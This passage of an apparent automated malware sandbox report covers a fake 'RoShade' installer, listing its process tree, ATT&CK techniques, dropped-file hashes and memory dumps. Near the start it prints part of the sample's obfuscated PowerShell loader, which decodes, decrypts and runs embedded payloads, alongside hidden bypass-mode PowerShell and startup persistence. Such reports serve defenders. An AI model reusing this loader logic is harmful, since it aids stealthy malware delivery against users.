in $CqrpF) { if ($SlErN.StartsWith('eDUXrKYugqgoReAPJcwU')) { $sFZwQ=$SlErN.Substring(20); break; }}$payloads_var=[string[]]$sFZwQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
6⤵
PID:1504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1612

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\ms.cmd"
5⤵
PID:3436

C:\Windows\system32\cscript.exe
cscript /nologo CreateShortcut.vbs
6⤵
- Drops startup file
PID:2308

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
288B

MD5
0c9eacaeba410362a3ea61f7e6f910b0

SHA1
dc959e2f6014301ee6ba96a234390de017bdc2d9

SHA256
bd4bfda20253cf5b5b26c6b912d6232a87181b66589514dc2cdd65e517faec2e

SHA512
aacfb470acaebbd7576a5bf300f1dfedda8a13094993c180b23fdf6adeef220a0b5a267370dd43e73fd66cbe5a08a80ae487d72d677eafc0e5feddb860d519b9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Filesize
20KB

MD5
2b757c2d45a525219889b6dc75c9c83b

SHA1
6ef2bd8e75e0654883b6d5a48d8a2d94cfe85b01

SHA256
6049e8f77a6951ad5d513d4bda0bd0e75fecd3ba3681428eeafa8fa7455b13ef

SHA512
4c124fb903998c819dd57781d76ac9ba7b195ec9438796430201f4ace0d85f453f0265abde7afc6313b439dbd38eef2a0a7a63a63a955ccbe011ff516e68e36a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
e7ec76ae6842f1cea30031c37837cfa8

SHA1
d27abcc79f14d8512b81f255745757fb20d4e163

SHA256
784c936cc22d2885a5752f374c5e083539ab4bb26bd820abce84da40add4c06e

SHA512
564c4e5e17fcf202dcc11f8f36d7353566dbb78fb3387eda5527c321752a41ad940c775d5b1eab92f4e7b2b9cae556f4a73ad65e82254188b15930cabdf4f36e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
690B

MD5
df805ffdf12e4224320235bfff4a3131

SHA1
566d74a4888622c1abf9ea193d4923fc0c443ad3

SHA256
733589df8fd3a396ed2eba79dfc7af4304c65df8045296f62b2ae356661ad88e

SHA512
d0aac98eab6b5396390f9c2455dc421150c561253193d65100f40cf2909f443b30c02e25e2cd2c1db0c905b9ca50c0e408374f422f8150fb2db3c263dbae2b1d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
d03d3edc00320cfe30b4a2a9b8c85c81

SHA1
36ca3614d7707340b178b06025bafcc4c474d95c

SHA256
9bbadee0deb0782e0724443a85615cf019ce0bf2319de4a12ba30c2ef53c5d23

SHA512
1759d0e35179c83d6b9dbd43c6bfdcedeaf90f1dcf278bb343ac52a05257780bca74877094e76ee146f1a02f6b8b7477a567c14cb51de4cb7e973010e0d8c2db

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
7f07975550f94a5cde949734605b498d

SHA1
a2df759fa4646bbfe2b239eefecbafb4fe551ca4

SHA256
7eae6a21357c18ed3c3a65bf9b8530b54ac8f294934923bdd9c0912709ad351b

SHA512
c8849da7fbd90d21b5fbf57858978fd6be9538878a9c7da176dc1737d50e153a6bcd5e597e29b21f9092db3d1fb7f35b4d2cf97fd0add7941ec6f92e2f910fde

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
1555508c4131eb5b1317a87c7c60f966

SHA1
7eb8de15649414495e4fd77409ba2d39dd4c95f9

SHA256
50c7a93f7c8e9ee2554555c928d56e08fcb1babb850683801f836e807eb40485

SHA512
4bc8f6c8e4f217f2964229687d1dc773362dc4761817fa452d4efbc83cd4f9bd19502d42d5eff139d4fac89ec8a82066074b73568b5007a7db2a2851338ff019

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

Filesize
14B

MD5
009b9a2ee7afbf6dd0b9617fc8f8ecba

SHA1
c97ed0652e731fc412e3b7bdfca2994b7cc206a7

SHA256
de607a2c68f52e15a104ead9ecbaa3e6862fdb11eac080e408ba4d69f1f7a915

SHA512
6161dd952ae140a8fb8aa5e33f06bc65fdc15ce3fbfe4c576dc2668c86bce4a1d5c1112caee014e5efa3698547faad3bc80ec253eedb43148e36e1a02ce89910

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
130KB

MD5
2b8a6626ce2df438d5b259233d625a28

SHA1
5d25b3790be1e03e57f9f6f27ed7e420dcba3f60

SHA256
a479b172631e878dfabb691c53b27b62306f44a2ebfe883ca45c4ff530713cd3

SHA512
0668266a76493ef573d7fa65160733165bd51b654b5a19082fb7eaed130b507926c0cea04e008c43a874813f5a75301d622e4989bff437ed30cb137dd523199c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
97KB

MD5
47e1cc9c4915ede8d57dcbcf23bc6c0b

SHA1
1b10856814efff846dcb49b8c86b09b0d357e3c3

SHA256
560ec7d236d586c4ce36549e92005f9f64a80342accc1272ade044fa5180289f

SHA512
c7c82f8bc96f1a640dd1358eeae04498a27b77de100f31a8a16cc9f88bb8950ab20c0a43d6c51ea53e9668206a66743785f76c2954ae3e8cb9d214e8f76df2d7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe583a26.TMP

Filesize
88KB

MD5
38d5c99e531e12f65b40555ada2c058f

SHA1
4e2b0036c515716cdc80ca402ba474d36e342c17

SHA256
17c0197fd9bad1bc6d5798a1169eb07323213d3f5f13ecad0d49c74d284058f3

SHA512
efa3507d3affa1087461509963031d0c12db7435aeff46278fa7a11b8b7e748087d50dc9015b79178cbcc16a793775dcbac79ab968b97575e975b6894d670e00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO8F778509\CreateShortcut.vbs

Filesize
271B

MD5
461dc12d10028464b59f760a766395da

SHA1
f83158a0123d72326b3312a0c6130aabf0cb2768

SHA256
ebe1436012fdc26e7a5025f29353acd15cacf16da0bf8543ad2fd95175dd0a35

SHA512
da62c026a30cf8a7311067319021fa13103eac812c4780533e5ae18b12a009226cc9c09e3640bb0fd81bc3df559b96d15c1b0f052f633708aa067317b6aebc5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO8F778509\RoShade Installer.lnk

Filesize
2KB

MD5
c406dd58d1e9ea63073543d01d4f75f6

SHA1
59794c420d2d63f9b9883fb3fd9b9c47c2f4fea3

SHA256
a0dcad8997dbf38ab0b820ec61ec5111bd22d0931d5fb3ab5d4b1fbade59d3a7

SHA512
e1fa0cedf178382e52c822d22c24bc0785aa29cec628cd004b2743beb214b9085a4bf173af1291ec086aa154ba26820547fdd49dfb671bc27b4b44961d5ffe2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rgauuzqe.dom.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\c.cmd

Filesize
60KB

MD5
9ad3df4c7e9e59877bffbdc65062caf2

SHA1
a43887ca420c9aada7db074b4c5cb85deb708944

SHA256
a612ab48a3f3cf98839b7eae685529cc8e31724828c757e455d91f8d92511ff6

SHA512
b499628bdb727db527214d7b20609b27e03d2ff12d2961bb6832b08ed50c08a4676c2bf50c9af4d1e11fdde04e2e9e60c54e88ba9da67c1adcc4778404075edc

Download Submit
C:\Users\Admin\AppData\Local\ms.cmd

Filesize
508B

MD5
f0fa5d094c79d5652e2bba7cd1ae258c

SHA1
077b1969e475629097117a71cb7ba294dfebcb25

SHA256
67f77922570e59002f35c91b3707a834f97d8d826e09457dd921f91d27f99637

SHA512
e79b358eb91cd126fd0dec193113250342b6099bca4228a7c8055ab951539a74da34f9d1cbb05ceeb2f442e588c00338f18c57700fbd529e65ec96dc84f77f1e

Download Submit
C:\Users\Admin\AppData\Local\n.cmd

Filesize
104KB

MD5
90e3f82e15b916e8bfbfe6d5e03791ed

SHA1
9d19792b7c1373a80b55e48600df4ba9d3e2ea37

SHA256
a54f37e9b1bb53550f91f9192ce4ab3d63c228211a3190e39171cc33b2583e30

SHA512
bd2cf2ec7e80a46f744a74dd3b7530604258bc23dc832ae3ab5daef2c21d1fdc873c9cc1770402e303f7f561bbfc02a54cbb4260e809f3ab1b1a820208a9c0c9

Download Submit
C:\Users\Admin\AppData\Roaming\microsoft.bat

Filesize
42KB

MD5
dfcb760cc444144f8b7ee2b352c3ced9

SHA1
c36fc2e9a4568cf7134df01efff043d2f62b6e4a

SHA256
0212953835dc3a8686196d2f7698d5218c51f559a53e4b502aaef4744cd1f382

SHA512
a55dd89bd8ceae378c9cc47cb1797df8832f1c512168b738c7982841d0226bd44bae3e8cc145188ad2e51fd45bee0ce0d32230472e5afaeb935d979ff58c9399

Download Submit
C:\Users\Admin\Downloads\RoShade.zip.crdownload

Filesize
260KB

MD5
73912d29e413a2b1f299cbc441329a13

SHA1
7e883ee5d96531cce3c9dea4349710a489dec17d

SHA256
d72a37c044daa8b74e197421e5deb6f015c6c89ecb0b397ab2343c7ba06568cb

SHA512
f509d70f5fb4ec56621b9c80ce58f36f699bb2b20fc14f9f18ce721d559c6f8c808204ca5d17f48666d6cb359f27beeb53329c223e18e8d9857aab166dfb6193

Download Submit
\??\pipe\crashpad_564_KFWRMLBMTIDVRBSJ

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1612-246-0x000001E6F19A0000-0x000001E6F19AC000-memory.dmp

Filesize
48KB

Download
memory/1612-247-0x000001E6F1C10000-0x000001E6F1C1E000-memory.dmp

Filesize
56KB

Download
memory/1612-244-0x00007FF96EA50000-0x00007FF96EC45000-memory.dmp

Filesize
2.0MB

Download
memory/1612-243-0x000001E6F1990000-0x000001E6F19A0000-memory.dmp

Filesize
64KB

Download
memory/1612-245-0x00007FF96DFA0000-0x00007FF96E05E000-memory.dmp

Filesize
760KB

Download
memory/1828-189-0x000001F8E5D30000-0x000001F8E5D74000-memory.dmp

Filesize
272KB

Download
memory/1828-195-0x000001F8E5D80000-0x000001F8E5D88000-memory.dmp

Filesize
32KB

Download
memory/1828-194-0x000001F8E5D20000-0x000001F8E5D28000-memory.dmp

Filesize
32KB

Download
memory/1828-193-0x00007FF96DFA0000-0x00007FF96E05E000-memory.dmp

Filesize
760KB

Download
memory/1828-192-0x00007FF96EA50000-0x00007FF96EC45000-memory.dmp

Filesize
2.0MB

Download
memory/1828-191-0x000001F8E5D10000-0x000001F8E5D20000-memory.dmp

Filesize
64KB

Download
memory/1828-190-0x000001F8E6150000-0x000001F8E61C6000-memory.dmp

Filesize
472KB

Download
memory/1992-164-0x000002936D4C0000-0x000002936D4E2000-memory.dmp

Filesize
136KB

Download
memory/4944-212-0x000002D7F0760000-0x000002D7F0780000-memory.dmp

Filesize
128KB

Download
memory/4944-211-0x000002D7F0750000-0x000002D7F0764000-memory.dmp

Filesize
80KB

Download
memory/4944-210-0x00007FF96DFA0000-0x00007FF96E05E000-memory.dmp

Filesize
760KB

Download
memory/4944-209-0x00007FF96EA50000-0x00007FF96EC45000-memory.dmp

Filesize
2.0MB

Download
memory/4944-208-0x000002D7F02F0000-0x000002D7F0300000-memory.dmp

Filesize
64KB

Download